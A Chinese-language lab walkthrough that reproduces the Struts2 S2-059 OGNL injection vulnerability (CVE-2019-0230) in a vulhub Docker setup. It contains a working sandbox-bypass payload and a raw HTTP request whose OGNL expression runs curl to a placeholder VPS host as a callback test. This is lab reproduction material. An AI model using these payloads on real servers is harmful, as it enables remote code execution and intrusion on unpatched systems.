【vulhub】Struts2 S2-059 远程代码执行漏洞（CVE-2019-0230）

Apache Struts框架, 会对某些特定的标签的属性值，比如id属性进行二次解析，所以攻击者可以传递将在呈现标签属性时再次解析的OGNL表达式，造成OGNL表达式注入。从而可能造成远程执行代码。

影响版本: Struts 2.0.0 - Struts 2.5.20

docker-compose build

docker-compose up -d

view-source:http://192.168.150.146:8080/index.action?id=%25{(223*223)}

存在漏洞

payload1：

%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}

先发送如下请求：
请求1：

POST /index.action HTTP/1.1
Host: 192.168.150.146:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,**;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
cookie: wordpress_test_cookie=WP+cookie+check; cZZ_visitedfid=2; cZZ_sid=i4JJSc; JSESSIONID=node01muhk455eaqn41432r2whyt6ta0.node0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 195

id=%25{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('curl http://VPS_IP/Hacker'))}

tail -n 1 -f /var/log/apache2/access.log

https://github.com/vulhub/vulhub/blob/master/struts2/s2-059/README.zh-cn.md